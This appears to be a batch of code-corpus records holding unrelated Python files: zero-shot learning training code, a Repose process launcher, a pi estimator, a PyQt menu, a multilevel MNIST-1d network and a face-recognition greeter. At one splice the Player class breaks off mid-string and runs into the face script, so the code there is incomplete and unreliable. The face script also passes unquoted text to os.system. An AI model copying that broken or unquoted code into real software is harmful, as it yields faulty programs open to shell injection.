np.squeeze(att_splits[test_seen_loc]-1)]\n\t\tself.X_test_unseen = feat[:, np.squeeze(att_splits[test_unseen_loc]-1)]\n\n\t\tlabels = res101['labels']\n\t\tself.labels_trainval_gzsl = np.squeeze(labels[np.squeeze(att_splits[trainval_loc]-1)])\n\t\tself.labels_test_seen = np.squeeze(labels[np.squeeze(att_splits[test_seen_loc]-1)])\n\t\tself.labels_test_unseen = np.squeeze(labels[np.squeeze(att_splits[test_unseen_loc]-1)])\n\t\tself.labels_test = np.concatenate((self.labels_test_seen, self.labels_test_unseen), axis=0)\n\n\t\ttrain_classes = np.unique(np.squeeze(labels[np.squeeze(att_splits[train_loc]-1)]))\n\t\tval_classes = np.unique(np.squeeze(labels[np.squeeze(att_splits[val_loc]-1)]))\n\t\ttrainval_classes_seen = np.unique(self.labels_trainval_gzsl)\n\t\tself.test_classes_seen = np.unique(self.labels_test_seen)\n\t\tself.test_classes_unseen = np.unique(self.labels_test_unseen)\n\t\ttest_classes = np.unique(self.labels_test) # All Classes of the dataset\n\n\t\ttrain_gzsl_indices=[]\n\t\tval_gzsl_indices=[]\n\n\t\tfor cl in train_classes:\n\t\t\ttrain_gzsl_indices = train_gzsl_indices + np.squeeze(np.where(self.labels_trainval_gzsl==cl)).tolist()\n\n\t\tfor cl in val_classes:\n\t\t\tval_gzsl_indices = val_gzsl_indices + np.squeeze(np.where(self.labels_trainval_gzsl==cl)).tolist()\n\n\t\ttrain_gzsl_indices = sorted(train_gzsl_indices)\n\t\tval_gzsl_indices = sorted(val_gzsl_indices)\n\t\t\n\t\tself.X_train_gzsl = self.X_trainval_gzsl[:, np.array(train_gzsl_indices)]\n\t\tself.labels_train_gzsl = self.labels_trainval_gzsl[np.array(train_gzsl_indices)]\n\t\t\n\t\tself.X_val_gzsl = self.X_trainval_gzsl[:, np.array(val_gzsl_indices)]\n\t\tself.labels_val_gzsl = self.labels_trainval_gzsl[np.array(val_gzsl_indices)]\n\n\t\tprint('Tr:{}; Val:{}; Tr+Val:{}; Test Seen:{}; Test Unseen:{}\\n'.format(self.X_train_gzsl.shape[1], self.X_val_gzsl.shape[1], \n\t\t\t self.X_trainval_gzsl.shape[1], self.X_test_seen.shape[1], \n\t\t\t self.X_test_unseen.shape[1]))\n\n\t\ti=0\n\t\tfor labels in trainval_classes_seen:\n\t\t\tself.labels_trainval_gzsl[self.labels_trainval_gzsl == labels] = i \n\t\t\ti+=1\n\n\t\tj=0\n\t\tfor labels in train_classes:\n\t\t\tself.labels_train_gzsl[self.labels_train_gzsl == labels] = j\n\t\t\tj+=1\n\n\t\tk=0\n\t\tfor labels in val_classes:\n\t\t\tself.labels_val_gzsl[self.labels_val_gzsl == labels] = k\n\t\t\tk+=1\n\n\t\tsig = att_splits['att']\n\t\t# Shape -> (Number of attributes, Number of Classes)\n\t\tself.trainval_sig = sig[:, trainval_classes_seen-1]\n\t\tself.train_sig = sig[:, train_classes-1]\n\t\tself.val_sig = sig[:, val_classes-1]\n\t\tself.test_sig = sig[:, test_classes-1] # Entire Signature Matrix\n\n\t\tif self.args.norm_type=='std':\n\t\t\tscaler_train = preprocessing.StandardScaler()\n\t\t\tscaler_trainval = preprocessing.StandardScaler()\n\t\t\t\n\t\t\tscaler_train.fit(self.X_train_gzsl.T)\n\t\t\tscaler_trainval.fit(self.X_trainval_gzsl.T)\n\n\t\t\tself.X_train_gzsl = scaler_train.transform(self.X_train_gzsl.T).T\n\t\t\tself.X_val_gzsl = scaler_train.transform(self.X_val_gzsl.T).T\n\t\t\t\n\t\t\tself.X_trainval_gzsl = scaler_trainval.transform(self.X_trainval_gzsl.T).T\n\t\t\tself.X_test_seen = scaler_trainval.transform(self.X_test_seen.T).T\n\t\t\tself.X_test_unseen = scaler_trainval.transform(self.X_test_unseen.T).T\n\n\t\tif self.args.norm_type=='L2':\n\t\t\tself.X_train_gzsl = self.normalizeFeature(self.X_train_gzsl.T).T\n\t\t\tself.X_trainval_gzsl = self.normalizeFeature(self.X_trainval_gzsl.T).T\n\t\t\t# self.X_val = self.normalizeFeature(self.X_val.T).T\n\t\t\t# self.X_test = self.normalizeFeature(self.X_test.T).T\n\n\tdef normalizeFeature(self, x):\n\t # x = N x d (d:feature dimension, N:number of instances)\n\t x = x + 1e-10\n\t feature_norm = np.sum(x**2, axis=1)**0.5 # l2-norm\n\t feat = x / feature_norm[:, np.newaxis]\n\n\t return feat\n\n\tdef update_W(self, X, labels, sig, W, idx, train_classes, beta):\n\t\t\n\t\tfor j in idx:\n\t\t\t\n\t\t\tX_n = X[:, j]\n\t\t\ty_n = labels[j]\n\t\t\ty_ = train_classes[train_classes!=y_n]\n\t\t\tXW = np.dot(X_n, W)\n\t\t\tgt_class_score = np.dot(XW, sig[:, y_n])\n\n\t\t\tfor i in range(len(y_)):\n\t\t\t\tlabel = random.choice(y_)\n\t\t\t\tscore = 1+np.dot(XW, sig[:, label])-gt_class_score # acc. to original paper, margin shd always be 1.\n\t\t\t\tif score>0:\n\t\t\t\t\tY = np.expand_dims(sig[:, y_n]-sig[:, label], axis=0)\n\t\t\t\t\tW += self.args.lr*beta[int(y_.shape[0]/(i+1))]*np.dot(np.expand_dims(X_n, axis=1), Y)\n\t\t\t\t\tbreak\n\n\t\treturn W\n\n\tdef fit_train(self):\n\n\t\tprint('Training on train set...\\n')\n\n\t\tbest_val_acc = 0.0\n\t\tbest_tr_acc = 0.0\n\t\tbest_val_ep = -1\n\t\tbest_tr_ep = -1\n\t\t\n\t\trand_idx = np.arange(self.X_train_gzsl.shape[1])\n\n\t\tW = np.random.rand(self.X_train_gzsl.shape[0], self.train_sig.shape[0])\n\t\tW = self.normalizeFeature(W.T).T\n\n\t\ttrain_classes = np.unique(self.labels_train_gzsl)\n\n\t\tbeta = np.zeros(len(train_classes))\n\t\tfor i in range(1, beta.shape[0]):\n\t\t\tsum_alpha=0.0\n\t\t\tfor j in range(1, i+1):\n\t\t\t\tsum_alpha+=1/j\n\t\t\tbeta[i] = sum_alpha\n\n\t\tfor ep in range(self.args.epochs):\n\n\t\t\tstart = time.time()\n\n\t\t\tshuffle(rand_idx)\n\n\t\t\tW = self.update_W(self.X_train_gzsl, self.labels_train_gzsl, self.train_sig, W, rand_idx, train_classes, beta)\n\t\t\t\n\t\t\tval_acc = self.zsl_acc(self.X_val_gzsl, W, self.labels_val_gzsl, self.val_sig)\n\t\t\ttr_acc = self.zsl_acc(self.X_train_gzsl, W, self.labels_train_gzsl, self.train_sig)\n\n\t\t\tend = time.time()\n\t\t\t\n\t\t\telapsed = end-start\n\t\t\t\n\t\t\tprint('Epoch:{}; Train Acc:{}; Val Acc:{}; Time taken:{:.0f}m {:.0f}s\\n'.format(ep+1, tr_acc, val_acc, elapsed//60, elapsed%60))\n\t\t\t\n\t\t\tif val_acc>best_val_acc:\n\t\t\t\tbest_val_acc = val_acc\n\t\t\t\tbest_val_ep = ep+1\n\t\t\t\n\t\t\tif tr_acc>best_tr_acc:\n\t\t\t\tbest_tr_ep = ep+1\n\t\t\t\tbest_tr_acc = tr_acc\n\n\t\t\tif ep+1-best_val_ep>self.args.early_stop:\n\t\t\t\tprint('Early Stopping by {} epochs. Exiting...'.format(self.args.epochs-(ep+1)))\n\t\t\t\tbreak\n\n\t\tprint('Best Val Acc:{} @ Epoch {}. Best Train Acc:{} @ Epoch {}\\n'.format(best_val_acc, best_val_ep, best_tr_acc, best_tr_ep))\n\t\t\n\t\treturn best_val_ep\n\n\tdef fit_trainval(self):\n\n\t\tprint('\\nTraining on trainval set for GZSL...\\n')\n\n\t\tbest_tr_acc = 0.0\n\t\tbest_tr_ep = -1\n\t\t\n\t\trand_idx = np.arange(self.X_trainval_gzsl.shape[1])\n\n\t\tW = np.random.rand(self.X_trainval_gzsl.shape[0], self.trainval_sig.shape[0])\n\t\tW = self.normalizeFeature(W.T).T\n\n\t\ttrainval_classes = np.unique(self.labels_trainval_gzsl)\n\n\t\tbeta = np.zeros(len(trainval_classes))\n\t\tfor i in range(1, beta.shape[0]):\n\t\t\tsum_alpha=0.0\n\t\t\tfor j in range(1, i+1):\n\t\t\t\tsum_alpha+=1/j\n\t\t\tbeta[i] = sum_alpha\n\n\t\tfor ep in range(self.num_epochs_trainval):\n\n\t\t\tstart = time.time()\n\n\t\t\tshuffle(rand_idx)\n\n\t\t\tW = self.update_W(self.X_trainval_gzsl, self.labels_trainval_gzsl, self.trainval_sig, W, rand_idx, trainval_classes, beta)\n\t\t\t\n\t\t\ttr_acc = self.zsl_acc(self.X_trainval_gzsl, W, self.labels_trainval_gzsl, self.trainval_sig)\n\n\t\t\tend = time.time()\n\t\t\t\n\t\t\telapsed = end-start\n\t\t\t\n\t\t\tprint('Epoch:{}; Trainval Acc:{}; Time taken:{:.0f}m {:.0f}s\\n'.format(ep+1, tr_acc, elapsed//60, elapsed%60))\n\t\t\t\t\t\t\n\t\t\tif tr_acc>best_tr_acc:\n\t\t\t\tbest_tr_ep = ep+1\n\t\t\t\tbest_tr_acc = tr_acc\n\t\t\t\tbest_W = np.copy(W)\n\n\t\tprint('Best Trainval Acc:{} @ Epoch {}\\n'.format(best_tr_acc, best_tr_ep))\n\t\t\n\t\treturn best_W\n\n\tdef zsl_acc(self, X, W, y_true, sig): # Class Averaged Top-1 Accuarcy\n\n\t\tXW = np.dot(X.T, W)# N x k\n\t\tdist = 1-spatial.distance.cdist(XW, sig.T, 'cosine')# N x C(no. of classes)\n\t\tpredicted_classes = np.array([np.argmax(output) for output in dist])\n\t\tcm = confusion_matrix(y_true, predicted_classes)\n\t\tcm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\t\tacc = sum(cm.diagonal())/sig.shape[1]\n\n\t\treturn acc\n\n\tdef zsl_acc_gzsl(self, X, W, y_true, classes, sig): # Class Averaged Top-1 Accuarcy\n\n\t\tclass_scores = np.matmul(np.matmul(X.T, W), sig) # N x Number of Classes\n\t\ty_pred = np.array([np.argmax(output)+1 for output in class_scores])\n\n\t\tper_class_acc = np.zeros(len(classes))\n\n\t\tfor i in range(len(classes)):\n\t\t\tis_class = y_true==classes[i]\n\t\t\tper_class_acc[i] = ((y_pred[is_class]==y_true[is_class]).sum())/is_class.sum()\n\t\t\n\t\treturn per_class_acc.mean()\n\n\tdef evaluate(self):\n\n\t\tself.num_epochs_trainval = self.fit_train()\n\n\t\tbest_W = self.fit_trainval()\n\n\t\tprint('Testing...\\n')\n\n\t\tacc_seen_classes = self.zsl_acc_gzsl(self.X_test_seen, best_W, self.labels_test_seen, self.test_classes_seen, self.test_sig)\n\t\tacc_unseen_classes = self.zsl_acc_gzsl(self.X_test_unseen, best_W, self.labels_test_unseen, self.test_classes_unseen, self.test_sig)\n\t\tHM = 2*acc_seen_classes*acc_unseen_classes/(acc_seen_classes+acc_unseen_classes)\n\n\t\tprint('U:{}; S:{}; H:{}'.format(acc_unseen_classes, acc_seen_classes, HM))\n\nif __name__ == '__main__':\n\t\n\targs = parser.parse_args()\n\tprint('Dataset : {}\\n'.format(args.dataset))\n\t\n\tclf = ALE(args)\t\n\tclf.evaluate()\n","sub_path":"ALE/ale_gzsl.py","file_name":"ale_gzsl.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285874253","text":"#!/usr/bin/env python\n\n# Copyright (C) 2012-2013 Richard Sartor \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nimport subprocess\nimport socket\nimport logging\nimport threading\nimport Queue\nimport time\nimport requests\n\n\nlogger = logging.getLogger(__name__)\n\n\n_default_jar_file = 'usr/share/repose/repose-valve.jar'\n\n\nclass ReposeValve:\n def __init__(self, config_dir, port=None, https_port=None, jar_file=None,\n stop_port=None, insecure=False, wait_on_start=False):\n logger.debug('Creating new ReposeValve object (config_dir=%s, '\n 'jar_file=%s, stop_port=%s, insecure=%s)' %\n (config_dir, jar_file, stop_port, insecure))\n\n if jar_file is None:\n jar_file = _default_jar_file\n\n if stop_port is None:\n if port is None:\n stop_port = 9090\n else:\n stop_port = port + 1000\n\n if wait_on_start:\n if port is not None:\n wait_url = 'http://localhost:%s/' % str(port)\n elif https_port is not None:\n wait_url = 'https://localhost:%s' % str(https_port)\n else:\n raise ValueError(\"Either 'port' and/or 'https_port' must \"\n \"specify a port number if 'wait_on_start' is \"\n \"True\")\n\n self.config_dir = config_dir\n self.port = port\n self.jar_file = jar_file\n self.stop_port = stop_port\n self.insecure = insecure\n\n pargs = [\n 'java', '-jar', jar_file,\n '-c', config_dir,\n '-s', str(stop_port)\n ]\n\n if port is not None:\n pargs.append('-p')\n pargs.append(str(port))\n\n if https_port is not None:\n pargs.append('-ps')\n pargs.append(str(https_port))\n\n if insecure:\n pargs.append('-k')\n\n pargs.append('start')\n\n logger.debug('Starting valve with the following commonad line: \"%s\"' %\n ' '.join(pargs))\n\n self.proc = subprocess.Popen(pargs, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n self.stdout = ThreadedStreamReader(self.proc.stdout)\n self.stderr = ThreadedStreamReader(self.proc.stderr)\n\n if wait_on_start:\n wait_count = 0\n while True:\n try:\n sc = requests.get(wait_url)\n if int(sc) == 200:\n break\n except:\n pass\n time.sleep(1)\n wait_count += 1\n if wait_count > 30:\n break\n\n logger.debug('New ReposeValve object initialized (pid=%i)' %\n self.proc.pid)\n\n def stop(self, wait=True):\n try:\n logger.debug('Shutting down stdout and stderr readers.')\n self.stdout.shutdown()\n self.stderr.shutdown()\n\n logger.debug('Attempting to stop ReposeValve object (pid=%i, '\n 'stop_port=%s)' % (self.proc.pid, self.stop_port))\n s = socket.create_connection(('localhost', self.stop_port))\n s.send('stop\\r\\n')\n if wait:\n logger.debug('Waiting for process to end (pid=%i)' %\n self.proc.pid)\n self.wait()\n except:\n logger.debug('Couldn\\'t stop using the stop port, killing instead '\n '(pid=%i)' % self.proc.pid)\n self.proc.kill()\n logger.debug('Repose stopped (pid=%i)' % self.proc.pid)\n\n def wait(self):\n return self.proc.communicate()\n\n\nclass ThreadedStreamReader:\n def __init__(self, stream):\n self.stream = stream\n self.thread = threading.Thread(target=self._thread_target)\n self.thread.daemon = True\n self.thread.start()\n self.queue = Queue.Queue()\n self._shutdown = False\n\n def _thread_target(self):\n for line in self.stream.xreadlines():\n if self._shutdown:\n break\n self.queue.put(line)\n\n def readline(self, timeout=None):\n s = self.queue.get(timeout=timeout)\n self.queue.task_done()\n return s\n\n def readlines(self):\n lines = []\n while not self.queue.empty():\n lines.append(self.readline())\n return lines\n\n def shutdown(self):\n self._shutdown = True\n\n\ndef stream_printer(fin, fout):\n while True:\n for line in fin.readlines():\n fout.write(line)\n fout.flush()\n time.sleep(1)\n","sub_path":"repose.py","file_name":"repose.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"147475746","text":"#!/usr/bin/python3\nimport sys\nimport math\nimport random\n\nif (len(sys.argv)<2):\n sys.exit(\"Usage: pi.py [number of trials], e.g. pi.py 1000\")\n\ninside=0\ntrials=int(sys.argv[1])\n\nfor i in range(trials):\n x=random.random()\n y=random.random()\n if (x*x+y*y)<1.0:\n inside+=1\n\npi=4.0*float(inside)/float(trials)\nprint(\"pi estimate=%9.6f error=%9.6f\"%(pi, pi-math.pi))\n","sub_path":"pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524214379","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom SELECTSUBJECTC import Ui_SELECTSUBJECTC\r\nfrom SELECTSUBJECTT import Ui_SELECTSUBJECTT\r\nfrom CLOCK import DigitalClock\r\n\r\nclass Ui_FIRSTMENU(object):\r\n\r\n def openWindow(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = DigitalClock()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def openWindow1(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_SELECTSUBJECTC()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def openWindow2(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_SELECTSUBJECTT()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def openWindow3(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_FIRSTMENU()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def setupUi(self, FIRSTMENU):\r\n FIRSTMENU.setObjectName(\"FIRSTMENU\")\r\n FIRSTMENU.resize(200, 96)\r\n self.centralwidget = QtWidgets.QWidget(FIRSTMENU)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n self.btn_open = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open.setIcon(QtGui.QIcon('clock.png'))\r\n self.btn_open.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open.setGeometry(QtCore.QRect(10, 25, 40, 40))\r\n self.btn_open.setObjectName(\"btn_open\")\r\n self.btn_open.clicked.connect(self.openWindow)\r\n\r\n self.btn_open1 = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open1.setIcon(QtGui.QIcon('camera.png'))\r\n self.btn_open1.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open1.setGeometry(QtCore.QRect(55, 25, 40, 40))\r\n self.btn_open1.setObjectName(\"btn_open1\")\r\n self.btn_open1.clicked.connect(self.openWindow1)\r\n\r\n self.btn_open2 = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open2.setIcon(QtGui.QIcon('stopwatch.png'))\r\n self.btn_open2.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open2.setGeometry(QtCore.QRect(100, 25, 40, 40))\r\n self.btn_open2.setObjectName(\"btn_open2\")\r\n self.btn_open2.clicked.connect(self.openWindow2)\r\n\r\n self.btn_open3 = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open3.setIcon(QtGui.QIcon('bluetooth.png'))\r\n self.btn_open3.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open3.setGeometry(QtCore.QRect(145, 25, 40, 40))\r\n self.btn_open3.setObjectName(\"btn_open3\")\r\n self.btn_open3.clicked.connect(self.openWindow3)\r\n\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(70, 40, 211, 41))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.label.setFont(font)\r\n self.label.setObjectName(\"label\")\r\n FIRSTMENU.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(FIRSTMENU)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n FIRSTMENU.setStatusBar(self.statusbar)\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n FIRSTMENU = QtWidgets.QMainWindow()\r\n ui = Ui_FIRSTMENU()\r\n ui.setupUi(FIRSTMENU)\r\n FIRSTMENU.show()\r\n sys.exit(app.exec_())","sub_path":"TEST/FIRSTMENU.py","file_name":"FIRSTMENU.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"54169747","text":"from __future__ import annotations\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Linear\nimport torch\nimport copy\n\nclass MNIST1dBlock(nn.Module):\n def __init__(self, scaling=1.0, width=10, use_bias = False):\n super(MNIST1dBlock, self).__init__()\n\n self.scaling = scaling\n self.linear = nn.Linear(width, width, bias = use_bias)\n nn.init.xavier_normal_(self.linear.weight)\n self.shortcut = nn.Sequential()\n\n def forward(self, x):\n out = self.linear(x)\n out = float(self.scaling) * F.relu(out)\n out += self.shortcut(x)\n return out\n\n### mnist net ###\nclass MLFlatNetMNIST1d(nn.Module):\n linear: Linear\n def __init__(self, BasicBlock, num_layers=2048, scaling=1, width=10, nclasses=10, use_bias=True):\n super(MLFlatNetMNIST1d, self).__init__()\n\n self.num_blocks = num_layers\n\n layers = []\n self.linear_in = nn.Linear(40, 10, bias=use_bias)\n for i in range(self.num_blocks): # num_layers is n^m, the +1 is for nice matching\n layers.append(MNIST1dBlock(scaling=scaling, width = width, use_bias = use_bias))\n\n self.blocks = nn.Sequential(*layers)\n self.linear_out = nn.Linear(width, nclasses, bias=use_bias)\n\n def forward(self, x):\n out = self.linear_in(x)\n out = self.blocks(out)\n out = F.relu(self.linear_out(out))\n return out\n\n def restrict_weights(self, net_H: MLFlatNetMNIST1d, scaling=1.0):\n with torch.no_grad():\n net_H.linear_in.weight.data.copy_(torch.nn.parameter.Parameter(self.linear_in.weight.data))\n net_H.linear_in.bias.data.copy_(torch.nn.parameter.Parameter(self.linear_in.bias.data))\n for id_H, block_H in enumerate(net_H.blocks):\n block_h = self.blocks[2 * id_H]\n block_H.linear.weight.data.copy_(scaling*torch.nn.parameter.Parameter(block_h.linear.weight.data))\n block_H.linear.bias.data.copy_(scaling*torch.nn.parameter.Parameter(block_h.linear.bias.data))\n net_H.linear_out.weight.data.copy_(torch.nn.parameter.Parameter(self.linear_out.weight.data))\n net_H.linear_out.bias.data.copy_(torch.nn.parameter.Parameter(self.linear_out.bias.data))\n\n def restrict_gradient(self, net_H: MLFlatNetMNIST1d, scaling=1.0):\n with torch.no_grad():\n # I_h^H * g_h\n I_g_h = []\n\n I_g_h.append(self.linear_in.weight.grad)\n I_g_h.append(self.linear_in.bias.grad)\n\n for id_H, block_H in enumerate(net_H.blocks):\n block_h1 = self.blocks[2 * id_H]\n I_g_h.append(nn.Parameter(scaling*block_h1.linear.weight.grad).clone().detach())\n I_g_h.append(nn.Parameter(scaling*block_h1.linear.bias.grad).clone().detach())\n\n I_g_h.append(self.linear_out.weight.grad)\n I_g_h.append(self.linear_out.bias.grad)\n\n return I_g_h\n\n def form_v(self, net_H: MLFlatNetMNIST1d):\n # v = g_H(x_h)- I[g_h(x_h)], I_g_h = I[g_h(x_h)]\n # add 1st and last layer ?\n I_g_h = self.restrict_gradient(net_H)\n v = []\n last_idx = len(I_g_h) -1\n\n v.append(torch.add(net_H.linear_in.weight.grad, -1.0 * I_g_h[0]))\n v.append(torch.add(net_H.linear_in.bias.grad, -1.0 * I_g_h[1]))\n\n for id_H, block_H in enumerate(net_H.blocks):\n v.append(torch.add(block_H.linear.weight.grad, -1 * I_g_h[2 * (id_H + 1)]))\n v.append(torch.add(block_H.linear.bias.grad, -1 * I_g_h[2 * (id_H + 1) + 1]))\n\n v.append(torch.add(net_H.linear_out.weight.grad, -1 * I_g_h[last_idx - 1]))\n v.append(torch.add(net_H.linear_out.bias.grad, -1 * I_g_h[last_idx]))\n\n return v\n\n def prolong_step_to_gradient(self, prev_w_H, net_H: MLFlatNetMNIST1d):\n # I_H^h (x_H^2 - x_H^1)\n # note: we assemble e in the gradient of net_h\n last_idx =len(prev_w_H)-1\n sign = -1.0\n self.zero_grad() # set to zero, then we need to add only and we don't need grad(f(\\theta^2_h)) anymore\n\n self.linear_in.weight.grad.copy_(torch.add(sign * net_H.linear_in.weight.data, sign * -1 * prev_w_H[0].data))\n self.linear_in.bias.grad.copy_(torch.add(sign * net_H.linear_in.bias.data, sign * -1 * prev_w_H[1].data))\n\n for id_H, block_H in enumerate(net_H.blocks, 0):\n idx = 2*(id_H+1)\n\n block_h1 = self.blocks[2*id_H]\n block_h1.linear.weight.grad.add_(torch.add(sign * block_H.linear.weight.data, sign * -1.0 * prev_w_H[idx].data))\n block_h1.linear.bias.grad.add_(torch.add(sign * block_H.linear.bias.data, sign * -1.0 * prev_w_H[idx + 1].data))\n\n if id_H < net_H.num_blocks - 1:\n block_h2 = self.blocks[id_H * 2 + 1]\n block_H2 = net_H.blocks[id_H + 1]\n\n block_h2.linear.weight.grad.add_(0.5 * torch.add(sign * block_H.linear.weight.data, sign * -1 * prev_w_H[idx].data))\n block_h2.linear.weight.grad.add_(0.5 * torch.add(sign * block_H2.linear.weight.data, sign * -1 * prev_w_H[idx + 2].data))\n\n block_h2.linear.bias.grad.add_(0.5 * torch.add(sign * block_H.linear.bias.data, sign * -1 * prev_w_H[idx + 1].data))\n block_h2.linear.bias.grad.add_(0.5 * torch.add(sign * block_H2.linear.bias.data, sign * -1 * prev_w_H[idx + 3].data))\n\n self.linear_out.weight.grad.copy_(torch.add(sign * net_H.linear_out.weight.data, sign * -1 * prev_w_H[last_idx-1].data))\n self.linear_out.bias.grad.copy_(torch.add(sign * net_H.linear_out.bias.data, sign * -1 * prev_w_H[last_idx].data))\n\n def subtract_v_from_grad_f_H(self, v):\n sign = -1.0\n last_idx = len(v) -1\n self.linear_in.weight.grad.add_(sign * v[0])\n self.linear_in.bias.grad.add_(sign * v[1])\n # correct indices !\n for id_H, block_H in enumerate(self.blocks):\n block_H.linear.weight.grad.add_(sign * v[2 * (id_H + 1)])\n block_H.linear.bias.grad.add_(sign * v[2 * (id_H + 1) + 1])\n\n self.linear_out.weight.grad.add_(sign * v[last_idx-1])\n self.linear_out.bias.grad.add_(sign * v[last_idx])\n\n\n def save_weights_to_tensor(self):\n t = []\n t.append(copy.deepcopy(self.linear_in.weight.data))\n t.append(copy.deepcopy(self.linear_in.bias.data))\n\n for block in self.blocks:\n t.append(copy.deepcopy(block.linear.weight.data))\n t.append(copy.deepcopy(block.linear.bias.data))\n\n t.append(copy.deepcopy(self.linear_out.weight.data))\n t.append(copy.deepcopy(self.linear_out.bias.data))\n\n return t\n\n def _gather_flat_grad(self):\n views = []\n for p in self.parameters():\n if p.grad is None:\n view = p.data.new(p.data.numel()).zero_()\n elif p.grad.data.is_sparse:\n view = p.grad.data.to_dense().view(-1)\n else:\n view = p.grad.data.view(-1)\n views.append(view)\n return torch.cat(views, 0)\n\n def compute_m(self, level, v):\n m = 0\n with torch.no_grad():\n for param in self.parameters():\n m += torch.sum(param.data * param.grad)\n return m\n\n def save_grad_to_tensor(self):\n t = []\n t.append(copy.deepcopy(self.linear_in.weight.grad))\n t.append(copy.deepcopy(self.linear_in.bias.grad))\n\n for block in self.blocks:\n t.append(copy.deepcopy(block.linear.weight.grad))\n t.append(copy.deepcopy(block.linear.bias.grad))\n\n t.append(copy.deepcopy(self.linear_out.weight.grad))\n t.append(copy.deepcopy(self.linear_out.bias.grad))\n\n return t\n\n def copy_tensor_to_weights(self, t):\n last_idx = len(t) -1\n self.linear_in.weight.data = copy.deepcopy(t[0])\n self.linear_in.bias.data = copy.deepcopy(t[1])\n\n for id, block in enumerate(self.blocks):\n block.linear.weight.data = copy.deepcopy(t[2 * (id + 1)])\n block.linear.bias.data = copy.deepcopy(t[2 * (id + 1) + 1])\n\n self.linear_out.weight.data = copy.deepcopy(t[last_idx-1])\n self.linear_out.bias.data = copy.deepcopy(t[last_idx])","sub_path":"ml_mnist1d_flat.py","file_name":"ml_mnist1d_flat.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524759654","text":"class Player(object):\n def __init__(self, num, score, ping, guid, name, lastmsg, address, qport, rate):\n self.num = num\n self.score = score\n self.ping = ping\n self.guid = guid\n self.name = name\n self.lastmsg = lastmsg\n self.address = address\n self.qport = qport\n self.rate = rate\n\n def __repr__(self):\n return \" 10):\n\t\t\t\t\tcurrentname = name\n\t\t\t\t\tprint(currentname)\n\t\t\t\t\tprint('ok person? ',currentname == ok_person) \n\t\t\t\t\t\n\t\t\t\t\t# Say hi!\n\t\t\t\t\tsentences = sentences_ok if currentname == ok_person else sentences_no\n\t\t\t\t\tcurrent_sentence = random.choice(sentences)\n\t\t\t\t\tcurrent_sentence = current_sentence.replace(\"\", currentname)\n\t\t\t\t\t\n\t\t\t\t\tif args.voice == 'google':\n\t\t\t\t\t\tos.system(f'./speech.sh {current_sentence} ')\n\t\t\t\t\telif args.voice == 'espeak':\n\t\t\t\t\t\tos.system(f'espeak-ng -ven+f4 \"{current_sentence}\" ')\n\t\t\t\t\t\n\t\t\t\t\tframes_since_detect = 0\n\t\t\t\t\t\n\t\t\t\n\t\t\t# update the list of names\n\t\t\tnames.append(name)\n\n\t\t# loop over the recognized faces\n\t\tfor ((top, right, bottom, left), name) in zip(boxes, names):\n\t\t\t# draw the predicted face name on the image - color is in BGR\n\t\t\tcv2.rectangle(frame, (left, top), (right, bottom),\n\t\t\t\t(0, 255, 225), 2)\n\t\t\ty = top - 15 if top - 15 > 15 else top + 15\n\t\t\tcv2.putText(frame, name, (left, y), cv2.FONT_HERSHEY_SIMPLEX,\n\t\t\t\t.8, (0, 255, 255), 2)\n\n\t\t# display the image to our screen\n\t\tcv2.imshow(\"Facial Recognition is Running\", frame)\n\t\tkey = cv2.waitKey(1) & 0xFF\n\n\t\t# quit when 'q' key is pressed\n\t\tif key == ord(\"q\"):\n\t\t\tbreak\n\n\t\t# update the FPS counter\n\t\tfps.update()\n\t\tframes_since_detect += 1\n\n\t# stop the timer and display FPS information\n\tfps.stop()\n\tprint(\"[INFO] elasped time: {:.2f}\".format(fps.elapsed()))\n\tprint(\"[INFO] approx. FPS: 